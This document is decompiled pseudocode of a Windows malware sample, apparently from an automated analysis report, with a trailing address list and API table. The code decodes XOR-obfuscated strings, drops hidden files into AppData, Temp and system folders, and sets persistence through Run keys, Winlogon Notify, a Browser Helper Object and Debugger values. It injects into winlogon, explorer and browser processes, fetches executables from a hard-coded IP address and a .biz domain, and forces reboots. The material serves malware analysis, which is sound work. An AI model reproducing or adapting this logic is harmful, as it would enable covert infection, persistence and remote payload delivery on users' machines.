						__eflags = _t178 - 0x20;
						if(_t178 != 0x20) {
							_t381 =  &_a3592;
							_t179 = ExpandEnvironmentStringsA("%AppData%\\", _t381, 0x104);
							_push(0x80);
							_push( *0x4120c0);
							L00405E30();
							SetFileAttributesA(_t179, _t381);
							_t181 = CreateFileA(_t381, 0x40000000, 0, 0, 2, 0x80, 0);
							_a136 = _t181;
							__eflags = _t181;
							if(_t181 == 0) {
								L18:
								_t182 = GetLastError();
								__eflags = _t182 - 0x20;
								if(_t182 == 0x20) {
									goto L15;
								}
								_t353 = GetTempPathA(0x104, _t381);
								_push(0x80);
								_push( *0x4120c0);
								L00405E30();
								SetFileAttributesA(_t353, _t381);
								_t355 = CreateFileA(_t381, 0x40000000, 0, 0, 2, 0x80, 0);
								_a128 = _t355;
								__eflags = _t355;
								if(_t355 == 0) {
									L21:
									_t356 = GetLastError();
									__eflags = _t356 - 0x20;
									if(_t356 == 0x20) {
										goto L15;
									} else {
										L24:
										_t382 =  &_a3312;
										_t187 = ExpandEnvironmentStringsA("%AppData%\\", _t382, 0x104);
										_push(0x80);
										_push( *0x4120d0);
										L00405E30();
										SetFileAttributesA(_t187, _t382);
										_t189 = CreateFileA(_t382, 0x40000000, 0, 0, 2, 0x80, 0);
										_a128 = _t189;
										__eflags = _t189;
										_t403 = _t189;
										if(_t189 == 0) {
											L26:
											_t383 =  &_a3304;
											_t190 = GetTempPathA(0x104, _t383);
											_push(0x80);
											_push( *0x4120d0);
											L00405E30();
											SetFileAttributesA(_t190, _t383);
											_t192 = CreateFileA(_t383, 0x40000000, 0, 0, 2, 0x80, 0);
											_a120 = _t192;
											__eflags = _t192;
											_t403 = _t192;
											if(_t192 == 0) {
												L29:
												_a3296 = 0;
												L30:
												__eflags = _a3296;
												if(_a3296 != 0) {
													CreateFileA( &_a3296, 0x80000000, 1, 0, 3, 0, 0);
												}
												_t384 =  &_a128;
												GetSystemDirectoryA(_t384, 0x104);
												_push(0x41103e);
												_push(_t384);
												L00405E30();
												E004012C2(_t384);
												ExpandEnvironmentStringsA("%CommonProgramFiles%\\System\\", _t384, 0x104);
												E004012C2(_t384);
												ExpandEnvironmentStringsA("%AppData%\\", _t384, 0x104);
												E004012C2(_t384);
												_t202 = 0x407220;
												L33:
												__eflags = _t202 - 0x40724d;
												if(_t202 < 0x40724d) {
													 *_t202 =  *_t202 ^ 0x000000d4;
													_t202 =  &(_t202[1]);
													goto L33;
												}
												_t203 = RegOpenKeyExA(0x80000002, 0x407220, 0, 0x20006,  &_a104);
												__eflags = _t203;
												if(_t203 == 0) {
													L37:
													__eflags = _v4;
													if(_v4 == 0) {
														_t397 =  &_a5432;
														_t343 = E00401251(_a104);
														_push(_t397);
														L00405E40();
														_t344 = _t343 + 1;
														__eflags = _t344;
														RegSetValueExA(_a100.dwLowDateTime,  *0x4120b0, 0, 1, _t397, _t344);
													}
													RegDeleteValueA(_a104, "winrnt.exe");
													RegCloseKey(_a104);
													L40:
													__eflags =  *0x412100 - 2;
													if( *0x412100 != 2) {
														L80:
														CloseHandle(CreateThread(0, 0x10000, E0040265F, 2, 0,  &_a108));
														_t208 = 0x407000;
														while(1) {
															__eflags = _t208 - 0x407060;
															if(_t208 >= 0x407060) {
																break;
															}
															 *_t208 =  *_t208 ^ 0x000000d4;
															_t208 =  &(_t208[1]);
														}
														_v4 = 0;
														while(1) {
															E004011CF(0x80000002, 0x407000);
															__eflags = _v4 - 9;
															if(_v4 <= 9) {
																goto L119;
															}
															_a36 = 0;
															_a40 = 0;
															_t267 = E004025C3();
															__eflags = _t267;
															if(_t267 != 0) {
																L116:
																 *_t439 = 0;
																L120:
																_v0 = 0x3b;
																do {
																	__eflags = _a3284;
																	if(_a3284 != 0) {
																		_push(0);
																		_push("opera.exe");
																		_push("seamonkey.exe");
																		_push("mozilla.exe");
																		_push("firefox.exe");
																		_push("iexplore.exe");
																		_push("explorer.exe");
																		E0040318D( &_a3284);
																		_t439 =  &(_t439[8]);
																	}
																	__eflags = _v12;
																	if(_v12 != 0) {
																		_t388 =  &_a3828;
																		SetFileAttributesA(_t388, 0x21);
																		_t244 = RegCreateKeyA(0x80000002,  &_a4100,  &_a100);
																		__eflags = _t244;
																		if(_t244 == 0) {
																			E00401251(_a100.dwLowDateTime);
																			_a104 = 1;
																			_t248 = RegSetValueExA(_a100.dwLowDateTime, "IsInstalled", 0, 4,  &_a104, 4);
																			_push(_t388);
																			L00405E40();
																			_t249 = _t248 + 1;
																			__eflags = _t249;
																			RegSetValueExA(_a96, "StubPath", 0, 1, _t388, _t249);
																			RegCloseKey(_a96);
																		}
																	}
																	__eflags = _v8;
																	_t429 =  &_a100;
																	if(_v8 == 0) {
																		_t211 = RegOpenKeyExA(0x80000002, 0x407220, 0, 0x20006, _t429);
																		__eflags = _t211;
																		if(_t211 == 0) {
																			L131:
																			_t385 =  &_a5428;
																			_push(_t385);
																			L00405E40();
																			_t212 = _t211 + 1;
																			__eflags = _t212;
																			_push(_t212);
																			_push(_t385);
																			_push(1);
																			_push(0);
																			_push( *0x4120b0);
																			goto L132;
																		}
																		_t211 = RegOpenKeyExA(0x80000001, 0x407220, 0, 0x20006, _t429);
																		__eflags = _t211;
																		if(_t211 != 0) {
																			goto L133;
																		}
																		goto L131;
																	} else {
																		_t389 =  &_a4612;
																		SetFileAttributesA(_t389, 0x21);
																		_t218 = RegCreateKeyA(0x80000002, 0x408720,  &_a100);
																		__eflags = _t218;
																		if(_t218 != 0) {
																			L133:
																			__eflags = _v20;
																			if(_v20 == 0) {
																				goto L143;
																			}
																			_t386 =  &_a96;
																			_t219 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0x408778, _t386, 0);
																			__eflags = _t219;
																			if(_t219 == 0) {
																				L136:
																				RegSetValueExA(_a96, "SubshellState", 0, 3,  &_a1920, 0x22a);
																				RegCloseKey(_a96);
																				L137:
																				_t387 =  &_a3552;
																				SetFileAttributesA(_t387, 0x21);
																				__eflags =  *0x412100 - 2;
																				_t432 =  &_a96;
																				if( *0x412100 != 2) {
																					_t224 = RegCreateKeyA(0x80000000, "CLSID\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}\\InProcServer32", _t432);
																					__eflags = _t224;
																					if(_t224 != 0) {
																						goto L143;
																					}
																					_push(_t387);
																					L00405E40();
																					RegSetValueExA(_a92.dwLowDateTime, 0, 0, 1, _t387, _t224 + 1);
																					RegSetValueExA(_a92.dwLowDateTime, "ThreadingModel", 0, 1, "Both", 5);
																					RegCloseKey(_a92.dwLowDateTime);
																					_t229 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}", _t432);
																					__eflags = _t229;
																					if(_t229 != 0) {
																						goto L143;
																					}
																					L142:
																					RegCloseKey(_a92.dwLowDateTime);
																					goto L143;
																				}
																				_t231 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B}",  &_a96);
																				__eflags = _t231;
																				if(_t231 != 0) {
																					goto L143;
																				}
																				_t233 = E00401251(_a96);
																				_push(_t387);
																				L00405E40();
																				RegSetValueExA(_a92.dwLowDateTime, "DLLName", 0, 1, _t387, _t233 + 1);
																				RegSetValueExA(_a92, "Startup", 0, 1, "Startup", 8);
																				goto L142;
																			}
																			_t237 = RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0x408778, _t386, 0);
																			__eflags = _t237;
																			if(_t237 != 0) {
																				goto L137;
																			}
																			goto L136;
																		}
																		_t239 = E00401251(_a100);
																		_push(_t389);
																		L00405E40();
																		_push(_t239 + 1);
																		_push(_t389);
																		_push(1);
																		_push(0);
																		_push("Debugger");
																		L132:
																		RegSetValueExA(_a96, ??, ??, ??, ??, ??);
																		RegCloseKey(_a96);
																		goto L133;
																	}
																	L143:
																	SetFileAttributesA( &_a5424, 0x21);
																	Sleep(0x3e8);
																	_t159 =  &_v4;
																	 *_t159 = _v4 - 1;
																	__eflags =  *_t159;
																} while ( *_t159 >= 0);
																_t255 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0,  &_a12, 0);
																__eflags = _t255;
																if(_t255 == 0) {
																	_a8 = 4;
																	_t393 =  &_a4;
																	_t257 = RegQueryValueExA(_a12, "g00d d0gg", 0, 0, _t393,  &_a8);
																	__eflags = _t257;
																	if(_t257 == 0) {
																		_t260 = _a4 - 1;
																		__eflags = _t260;
																		_a4 = _t260;
																		if(_t260 == 0) {
																			RegDeleteValueA(_a12, "g00d d0gg");
																			Sleep(0x1388);
																			__eflags =  *0x412100 - 2;
																			if( *0x412100 != 2) {
																				ExitWindowsEx(6, 0);
																			} else {
																				RtlAdjustPrivilege(0x13, 1, 0,  &_a3);
																				 *0x412240(1);
																			}
																		} else {
																			RegSetValueExA(_a12, "g00d d0gg", 0, 4, _t393, 4);
																		}
																	}
																	RegCloseKey(_a12);
																}
																continue;
															}
															_t269 = RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0x2001f, 0,  &_a56, 0);
															__eflags = _t269;
															if(_t269 != 0) {
																__eflags =  *_t439;
																if( *_t439 == 0) {
																	goto L120;
																}
																L118:
																_v4 = 0;
																goto L120;
															}
															_t438 =  &_a48;
															GetSystemTimeAsFileTime(_t438);
															_a44 = 8;
															_t428 =  &_a36;
															_t271 = RegQueryValueExA(_a56, "ConnPred", 0,  &_a32, _t428,  &_a44);
															__eflags = _t271;
															if(_t271 != 0) {
																L89:
																__eflags = E004014D8(_t438, 0x412070) - 0x4af;
																if(__eflags <= 0) {
																	L100:
																	__eflags =  *0x412080;
																	if( *0x412080 == 0) {
																		L103:
																		_a44 = 8;
																		__eflags = RegQueryValueExA(_a56, "UseExtProfile", 0,  &_a32, _t428,  &_a44);
																		if(__eflags != 0) {
																			L105:
																			_t276 = E00402427(__eflags);
																			__eflags = _t276;
																			if(_t276 != 0) {
																				L115:
																				RegCloseKey(_a56);
																				goto L116;
																			}
																			_push(1);
																			_push(0);
																			_t279 = E0040211B("http://69.50.173.166/gdnOT2424.exe", 0);
																			__eflags = _t279;
																			if(_t279 == 0) {
																				L108:
																				_a44 = 8;
																				_t391 =  &_a20;
																				_t281 = RegQueryValueExA(_a56, "UseDflProfile", 0,  &_a32,  &_a20,  &_a44);
																				__eflags = _t281;
																				if(_t281 != 0) {
																					_t290 = _a36 + 0x1162f100;
																					__eflags = _t290;
																					asm("adc edx, 0xffffff9b");
																					_a20 = _t290;
																					_a24 = _a40;
																				}
																				__eflags = E004014D8( &_a48, _t391) - 0x152ab;
																				if(__eflags <= 0) {
																					goto L115;
																				} else {
																					_t284 = E00402427(__eflags);
																					__eflags = _t284;
																					if(_t284 != 0) {
																						goto L115;
																					}
																					_push(3);
																					_push(0);
																					_t286 = E0040211B("tombul.gif", 0);
																					__eflags = _t286;
																					if(_t286 == 0) {
																						goto L115;
																					}
																					_push(8);
																					_push(_t438);
																					_push(0xb);
																					_push(0);
																					_push("UseDflProfile");
																					L114:
																					RegSetValueExA(_a56, ??, ??, ??, ??, ??);
																					RegCloseKey(_a56);
																					 *_t439 = 1;
																					goto L118;
																				}
																			}
																			_a36 = _a48;
																			_a40 = _a52;
																			_push(8);
																			_push(_t438);
																			_push(0xb);
																			_push(0);
																			_push("UseExtProfile");
																			goto L114;
																		}
																		__eflags = E004014D8( &_a48,  &_a36) - 0x152ab;
																		if(__eflags <= 0) {
																			goto L108;
																		}
																		goto L105;
																	}
																	_push(3);
																	_push(0);
																	_t295 = E0040211B("grazie.gif", 0);
																	__eflags = _t295;
																	if(_t295 == 0) {
																		goto L103;
																	}
																	_a36 = _a48;
																	_a40 = _a52;
																	_push(8);
																	_push(_t438);
																	_push(0xb);
																	_push(0);
																	_push("ConnPred");
																	goto L114;
																}
																_t297 = E00402427(__eflags);
																__eflags = _t297;
																if(_t297 != 0) {
																	goto L115;
																}
																_t299 = E004019E8("http://utbidet-ugeas.biz/d/cc", 0, 1);
																_t431 = 0;
																__eflags = _t299;
																_t392 = _t299;
																if(_t299 != 0) {
																	_t304 = E00401E00(_t299,  &_a30, 2);
																	__eflags = _t304 - 2;
																	if(_t304 == 2) {
																		_t431 = 1;
																	}
																}
																E00401F59(_t392);
																__eflags = _t431;
																if(_t431 == 0) {
																	 *0x412080 = 0;
																} else {
																	 *0x412070 = _a48;
																	_t303 = 0;
																	__eflags = _a30 - 0x49;
																	 *0x412074 = _a52;
																	if(_a30 == 0x49) {
																		__eflags = _a31 - 0x54;
																		if(_a31 == 0x54) {
																			_t303 = 1;
																		}
																	}
																	 *0x412080 = _t303;
																}
																goto L100;
															}
															_t306 = E004014D8(_t438, _t428);
															__eflags = _t306 - 0x152ab;
															if(_t306 <= 0x152ab) {
																goto L103;
															}
															goto L89;
															L119:
															_t122 =  &_v4;
															 *_t122 =  &(_v4->nLength);
															__eflags =  *_t122;
															goto L120;
														}
													}
													_t307 = 0x4071e0;
													while(1) {
														__eflags = _t307 - 0x407214;
														if(_t307 >= 0x407214) {
															break;
														}
														 *_t307 =  *_t307 ^ 0x000000d4;
														_t307 =  &(_t307[1]);
													}
													_t308 = 0x4071c3;
													while(1) {
														__eflags = _t308 - 0x4071cf;
														if(_t308 >= 0x4071cf) {
															break;
														}
														 *_t308 =  *_t308 ^ 0x000000d4;
														_t308 =  &(_t308[1]);
													}
													_t433 =  &_a104;
													_t309 = RegCreateKeyA(0x80000002, 0x4071e0, _t433);
													__eflags = _t309;
													if(_t309 == 0) {
														RegSetValueExA(_a104, 0x4071c3, 0, 4,  &_a108, 4);
														RegCloseKey(_a104);
													}
													_t310 = 0x4071a0;
													while(1) {
														__eflags = _t310 - 0x4071c2;
														if(_t310 >= 0x4071c2) {
															break;
														}
														 *_t310 =  *_t310 ^ 0x000000d4;
														_t310 =  &(_t310[1]);
													}
													_t311 = 0x407177;
													while(1) {
														__eflags = _t311 - 0x407188;
														if(_t311 >= 0x407188) {
															break;
														}
														 *_t311 =  *_t311 ^ 0x000000d4;
														_t311 =  &(_t311[1]);
													}
													_t312 = 0x407160;
													while(1) {
														__eflags = _t312 - 0x407176;
														if(_t312 >= 0x407176) {
															break;
														}
														 *_t312 =  *_t312 ^ 0x000000d4;
														_t312 =  &(_t312[1]);
													}
													_t313 = 0x40714a;
													while(1) {
														__eflags = _t313 - 0x40715f;
														if(_t313 >= 0x40715f) {
															break;
														}
														 *_t313 =  *_t313 ^ 0x000000d4;
														_t313 =  &(_t313[1]);
													}
													_t314 = 0x407135;
													while(1) {
														__eflags = _t314 - 0x407149;
														if(_t314 >= 0x407149) {
															break;
														}
														 *_t314 =  *_t314 ^ 0x000000d4;
														_t314 =  &(_t314[1]);
													}
													_t315 = RegOpenKeyExA(0x80000002, 0x4071a0, 0, 0x20006, _t433);
													__eflags = _t315;
													if(_t315 == 0) {
														_t396 =  &_a108;
														RegSetValueExA(_a104, 0x407177, 0, 4, _t396, 4);
														RegSetValueExA(_a104, 0x407160, 0, 4, _t396, 4);
														RegSetValueExA(_a104, 0x40714a, 0, 4, _t396, 4);
														RegSetValueExA(_a104, 0x407135, 0, 4, _t396, 4);
														RegCloseKey(_a104);
													}
													_t316 = 0x4070c0;
													while(1) {
														__eflags = _t316 - 0x407134;
														if(_t316 >= 0x407134) {
															break;
														}
														 *_t316 =  *_t316 ^ 0x000000d4;
														_t316 =  &(_t316[1]);
													}
													_t317 = RegOpenKeyExA(0x80000002, 0x4070c0, 0, 0x2001f, _t433);
													__eflags = _t317;
													if(_t317 != 0) {
														goto L80;
													}
													_t319 = E00401000(0x8000);
													_a68 = 0x4000;
													_t434 = _t319;
													_t320 = 0x407080;
													_a108.dwLowDateTime = 0x4000;
													while(1) {
														__eflags = _t320 - 0x4070a4;
														if(_t320 >= 0x4070a4) {
															break;
														}
														 *_t320 =  *_t320 ^ 0x000000d4;
														_t320 =  &(_t320[1]);
													}
													_a4 = 0;
													while(1) {
														_t69 =  &(_t434[0x4000]); // 0x4000
														_t394 = _t69;
														_t324 = RegEnumValueA(_a104, _a4, _t434,  &_a108, 0,  &_a64, _t69,  &_a68);
														__eflags = _t324;
														if(_t324 != 0) {
															break;
														}
														__eflags = _a64 - 1;
														if(_a64 == 1) {
															_t326 = E00401311(_t394, 0x40708d);
															__eflags = _t326;
															if(_t326 != 0) {
																RegDeleteValueA(_a104, _t434);
															}
														}
														_t64 =  &_a4;
														 *_t64 = _a4 + 1;
														__eflags =  *_t64;
														_a68 = 0x4000;
														_a108.dwLowDateTime = 0x4000;
													}
													_t395 =  &_a5432;
													_t329 = wsprintfA(_t434, 0x407080, _t395) + 1;
													__eflags = _t329;
													_t439 =  &(_t439[3]);
													RegSetValueExA(_a112, _t395, 0, 1, _t434, _t329);
													E00401029(_t434);
													RegCloseKey(_a112);
													goto L80;
												}
												_t347 = RegOpenKeyExA(0x80000001, 0x407220, 0, 0x20006,  &_a104);
												__eflags = _t347;
												if(_t347 != 0) {
													goto L40;
												}
												goto L37;
											}
											__eflags = _t192 - 0xffffffff;
											if(_t192 == 0xffffffff) {
												goto L29;
											}
											L28:
											WriteFile(_t403, 0x408840, 0x5e00,  &_a116, 0);
											CloseHandle(_a120);
											goto L30;
										}
										__eflags = _t189 - 0xffffffff;
										if(_t189 != 0xffffffff) {
											goto L28;
										}
										goto L26;
									}
								}
								__eflags = _t355 + 1;
								if(_t355 + 1 != 0) {
									L9:
									WriteFile(_a128, 0x40e640, 0x1400,  &_a124, 0);
									__eflags = _v20;
									if(_v20 != 0) {
										SetFileTime(_a128,  &_a92,  &_a100,  &_a108);
									}
									CloseHandle(_a128);
									_a4 = 1;
									_push(0);
									_push("winlogon.exe");
									_t398 =  &_a3576;
									_t361 = E0040318D(_t398);
									_t439 =  &(_t439[3]);
									__eflags = _t361;
									if(_t361 == 0) {
										_push(0);
										_push("explorer.exe");
										E0040318D(_t398);
										_t439 =  &(_t439[3]);
									}
									_push(0);
									_push("kernel32.dll");
									_push(_t398);
									L23:
									E0040318D();
									_t439 =  &(_t439[3]);
									CreateFileA( &_a3584, 0x80000000, 1, 0, 3, 0, 0);
									goto L24;
								}
								goto L21;
							}
							__eflags = _t181 + 1;
							if(_t181 + 1 != 0) {
								goto L9;
							}
							goto L18;
						}
						L15:
						_a12 = 1;
						_push(0);
						_push("kernel32.dll");
						_push( &_a3584);
						goto L23;
					}
					__eflags = _t177 + 1;
					if(_t177 + 1 == 0) {
						goto L14;
					}
					goto L9;
				}
				_t435 =  &_a1450;
				if(GetTempFileNameA(_t379, ?str?, 0, _t435) == 0) {
					goto L7;
				}
				_t370 = CreateFileA(_t435, 0x40000000, 0, 0, 2, 0x80, 0);
				_a160 = _t370;
				if(_t370 != 0 && _t370 + 1 != 0) {
					WriteFile(_a160, _a20, _t437,  &_a156, 0);
					CloseHandle(_a160);
					CreateFileA( &_a1450, 0x80000000, 1, 0, 3, 0, 0);
					_t436 =  &_a1977;
					_t427 =  &_a1417;
					_t402 =  &_a2530;
					L5:
					if(_t436 < _t402) {
						_t378 = _a1976 & 0x000000ff ^  *_t427;
						_t427 =  &(_t427[0]);
						 *_t436 = _t378;
						_t436 =  &(_t436[1]);
						goto L5;
					}
				}
			}

0x00404dc1
0x00404e76
0x00404e7a
0x00404e84
0x00404e8c
0x00404e91
0x00404e96
0x00404e9c
0x00404ea1
0x00404ea2
0x00404ea8
0x00404eae
0x00404ec6
0x00404ecb
0x00404ed2
0x00404ed4
0x00404f78
0x00404f78
0x00404f7d
0x00404f80
0x00404fa3
0x00404fb0
0x00404fb5
0x00404fba
0x00404fc1
0x00404fc7
0x00404fdf
0x00404fe4
0x00404feb
0x00404fed
0x00404ff6
0x00404ff6
0x00404ffb
0x00404ffe
0x00000000
0x00000000
0x00405006
0x0040500b
0x00405010
0x00405017
0x0040501d
0x00405035
0x0040503a
0x00405041
0x00405043
0x0040504c
0x0040504c
0x00405051
0x00405054
0x00000000
0x0040505a
0x00405080
0x00405085
0x00405092
0x00405097
0x0040509c
0x004050a3
0x004050a9
0x004050c1
0x004050c6
0x004050cd
0x004050cf
0x004050d1
0x004050d8
0x004050d8
0x004050e5
0x004050ea
0x004050ef
0x004050f6
0x004050fc
0x00405114
0x00405119
0x00405120
0x00405122
0x00405124
0x00405153
0x00405153
0x0040515b
0x0040515b
0x00405163
0x0040517c
0x0040517c
0x00405186
0x0040518e
0x00405193
0x00405198
0x00405199
0x004051a0
0x004051b0
0x004051b7
0x004051c7
0x004051ce
0x004051d3
0x004051d8
0x004051d8
0x004051dd
0x004051df
0x004051e2
0x00000000
0x004051e2
0x004051fe
0x00405203
0x00405205
0x00405229
0x00405229
0x0040522e
0x00405237
0x0040523e
0x00405243
0x00405244
0x00405249
0x00405249
0x0040525d
0x0040525d
0x0040526e
0x0040527a
0x0040527f
0x0040527f
0x00405286
0x004054f1
0x0040550f
0x00405514
0x00405519
0x00405519
0x0040551e
0x00000000
0x00000000
0x00405520
0x00405523
0x00405523
0x00405526
0x0040552e
0x00405538
0x0040553d
0x00405542
0x00000000
0x00000000
0x00405548
0x00405550
0x00405558
0x0040555d
0x0040555f
0x004057d5
0x004057d5
0x004057f2
0x004057f2
0x004057fa
0x004057fa
0x00405802
0x00405804
0x00405806
0x0040580b
0x00405810
0x00405815
0x0040581a
0x0040581f
0x0040582c
0x00405831
0x00405831
0x00405834
0x00405839
0x00405841
0x00405849
0x00405863
0x00405868
0x0040586a
0x00405873
0x00405878
0x0040589d
0x004058a2
0x004058a3
0x004058a8
0x004058a8
0x004058bb
0x004058c7
0x004058c7
0x0040586a
0x004058cc
0x004058d1
0x004058d8
0x00405933
0x00405938
0x0040593a
0x00405957
0x00405957
0x0040595e
0x0040595f
0x00405964
0x00405964
0x00405965
0x00405966
0x00405967
0x00405969
0x0040596b
0x00000000
0x0040596b
0x0040594e
0x00405953
0x00405955
0x00000000
0x00000000
0x00000000
0x004058da
0x004058dc
0x004058e4
0x004058f4
0x004058f9
0x004058fb
0x00405989
0x00405989
0x0040598e
0x00000000
0x00000000
0x00405996
0x004059b8
0x004059bd
0x004059bf
0x004059e7
0x00405a04
0x00405a10
0x00405a15
0x00405a17
0x00405a1f
0x00405a24
0x00405a2b
0x00405a32
0x00405a9f
0x00405aa4
0x00405aa6
0x00000000
0x00000000
0x00405aa8
0x00405aa9
0x00405abe
0x00405ada
0x00405ae6
0x00405af6
0x00405afb
0x00405afd
0x00000000
0x00000000
0x00405aff
0x00405b06
0x00000000
0x00405b06
0x00405a3f
0x00405a44
0x00405a46
0x00000000
0x00000000
0x00405a53
0x00405a58
0x00405a59
0x00405a71
0x00405a8d
0x00000000
0x00405a8d
0x004059de
0x004059e3
0x004059e5
0x00000000
0x00000000
0x00000000
0x004059e5
0x00405908
0x0040590d
0x0040590e
0x00405914
0x00405915
0x00405916
0x00405918
0x0040591a
0x00405971
0x00405978
0x00405984
0x00000000
0x00405984
0x00405b0b
0x00405b15
0x00405b1f
0x00405b24
0x00405b24
0x00405b24
0x00405b24
0x00405b4c
0x00405b51
0x00405b53
0x00405b59
0x00405b66
0x00405b78
0x00405b7d
0x00405b7f
0x00405b85
0x00405b86
0x00405b88
0x00405b8c
0x00405bae
0x00405bb8
0x00405bbd
0x00405bc4
0x00405be5
0x00405bc6
0x00405bd1
0x00405bd9
0x00405bd9
0x00405b8e
0x00405b9e
0x00405b9e
0x00405b8c
0x00405bee
0x00405bee
0x00000000
0x00405b53
0x00405583
0x00405588
0x0040558a
0x004057de
0x004057e2
0x00000000
0x00000000
0x004057e4
0x004057e4
0x00000000
0x004057e4
0x00405590
0x00405595
0x0040559a
0x004055a7
0x004055bf
0x004055c4
0x004055c6
0x004055dc
0x004055e8
0x004055ed
0x00405669
0x00405669
0x00405670
0x004056a9
0x004056a9
0x004056cf
0x004056d1
0x004056e7
0x004056e7
0x004056ec
0x004056ee
0x004057cc
0x004057d0
0x00000000
0x004057d0
0x004056f4
0x004056fd
0x004056ff
0x00405705
0x00405708
0x0040572b
0x0040572b
0x00405738
0x00405750
0x00405755
0x00405757
0x00405761
0x00405761
0x00405766
0x00405769
0x0040576d
0x0040576d
0x0040577c
0x00405781
0x00000000
0x00405783
0x00405783
0x00405788
0x0040578a
0x00000000
0x00000000
0x0040578c
0x00405795
0x00405797
0x0040579d
0x004057a0
0x00000000
0x00000000
0x004057a2
0x004057a4
0x004057a5
0x004057a7
0x004057a9
0x004057ae
0x004057b5
0x004057be
0x004057c3
0x00000000
0x004057c3
0x00405781
0x00405712
0x00405716
0x0040571a
0x0040571c
0x0040571d
0x0040571f
0x00405721
0x00000000
0x00405721
0x004056e0
0x004056e5
0x00000000
0x00000000
0x00000000
0x004056e5
0x00405672
0x0040567b
0x0040567d
0x00405683
0x00405686
0x00000000
0x00000000
0x00405690
0x00405694
0x00405698
0x0040569a
0x0040569b
0x0040569d
0x0040569f
0x00000000
0x0040569f
0x004055ef
0x004055f4
0x004055f6
0x00000000
0x00000000
0x00405605
0x0040560b
0x0040560d
0x0040560f
0x00405611
0x00405619
0x0040561f
0x00405622
0x00405624
0x00405624
0x00405622
0x0040562a
0x0040562f
0x00405631
0x0040565f
0x00405633
0x0040563b
0x00405640
0x00405642
0x00405647
0x0040564d
0x0040564f
0x00405654
0x00405656
0x00405656
0x00405654
0x00405658
0x00405658
0x00000000
0x00405631
0x004055cc
0x004055d1
0x004055d6
0x00000000
0x00000000
0x00000000
0x004057ee
0x004057ee
0x004057ee
0x004057ee
0x00000000
0x004057ee
0x0040552e
0x0040528c
0x00405291
0x00405291
0x00405296
0x00000000
0x00000000
0x00405298
0x0040529b
0x0040529b
0x0040529e
0x004052a3
0x004052a3
0x004052a8
0x00000000
0x00000000
0x004052aa
0x004052ad
0x004052ad
0x004052b0
0x004052c2
0x004052c7
0x004052c9
0x004052e5
0x004052f1
0x004052f1
0x004052f6
0x004052fb
0x004052fb
0x00405300
0x00000000
0x00000000
0x00405302
0x00405305
0x00405305
0x00405308
0x0040530d
0x0040530d
0x00405312
0x00000000
0x00000000
0x00405314
0x00405317
0x00405317
0x0040531a
0x0040531f
0x0040531f
0x00405324
0x00000000
0x00000000
0x00405326
0x00405329
0x00405329
0x0040532c
0x00405331
0x00405331
0x00405336
0x00000000
0x00000000
0x00405338
0x0040533b
0x0040533b
0x0040533e
0x00405343
0x00405343
0x00405348
0x00000000
0x00000000
0x0040534a
0x0040534d
0x0040534d
0x00405362
0x00405367
0x00405369
0x0040536d
0x00405385
0x0040539d
0x004053b5
0x004053cd
0x004053d9
0x004053d9
0x004053de
0x004053e3
0x004053e3
0x004053e8
0x00000000
0x00000000
0x004053ea
0x004053ed
0x004053ed
0x00405402
0x00405407
0x00405409
0x00000000
0x00000000
0x00405413
0x00405418
0x00405420
0x00405422
0x00405427
0x00405432
0x00405432
0x00405437
0x00000000
0x00000000
0x00405439
0x0040543c
0x0040543c
0x0040543f
0x00405484
0x00405488
0x00405488
0x004054ab
0x004054b0
0x004054b2
0x00000000
0x00000000
0x00405449
0x0040544e
0x00405457
0x0040545c
0x0040545e
0x00405468
0x00405468
0x0040545e
0x0040546d
0x0040546d
0x0040546d
0x00405471
0x00405479
0x00405479
0x004054b4
0x004054c7
0x004054c7
0x004054c8
0x004054d9
0x004054e0
0x004054ec
0x00000000
0x004054ec
0x00405220
0x00405225
0x00405227
0x00000000
0x00000000
0x00000000
0x00405227
0x00405126
0x00405129
0x00000000
0x00000000
0x0040512b
0x00405140
0x0040514c
0x00000000
0x0040514c
0x004050d3
0x004050d6
0x00000000
0x00000000
0x00000000
0x004050d6
0x00405054
0x00405045
0x00405046
0x00404ee1
0x00404efc
0x00404f01
0x00404f06
0x00404f27
0x00404f27
0x00404f33
0x00404f38
0x00404f40
0x00404f42
0x00404f47
0x00404f4f
0x00404f54
0x00404f57
0x00404f59
0x00404f5b
0x00404f5d
0x00404f63
0x00404f68
0x00404f68
0x00404f6b
0x00404f6d
0x00404f72
0x0040505c
0x0040505c
0x00405061
0x0040507b
0x00000000
0x0040507b
0x00000000
0x00405046
0x00404fef
0x00404ff0
0x00000000
0x00000000
0x00000000
0x00404ff0
0x00404f82
0x00404f82
0x00404f8a
0x00404f8c
0x00404f98
0x00000000
0x00404f98
0x00404eda
0x00404edb
0x00000000
0x00000000
0x00000000
0x00404edb
0x00404dc7
0x00404dde
0x00000000
0x00000000
0x00404df7
0x00404dfc
0x00404e05
0x00404e20
0x00404e2c
0x00404e48
0x00404e4d
0x00404e54
0x00404e5b
0x00404e62
0x00404e64
0x00404e6e
0x00404e70
0x00404e71
0x00404e73
0x00000000
0x00404e73
0x00404e64

APIs

GetTempPathA.KERNEL32(00000104), ref: 00404DBA
GetTempFileNameA.KERNEL32(?,tmp,00000000,?,00000104), ref: 00404DD7
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,tmp,00000000,?,00000104), ref: 00404DF7
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00404E20
CloseHandle.KERNEL32(?,?,?,?,?,00000000), ref: 00404E2C
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,00000000), ref: 00404E48
GetSystemDirectoryA.KERNEL32 ref: 00404E8C
lstrcat.KERNEL32(?,0041103E), ref: 00404EA2
lstrcat.KERNEL32(00000000,?), ref: 00404EA8
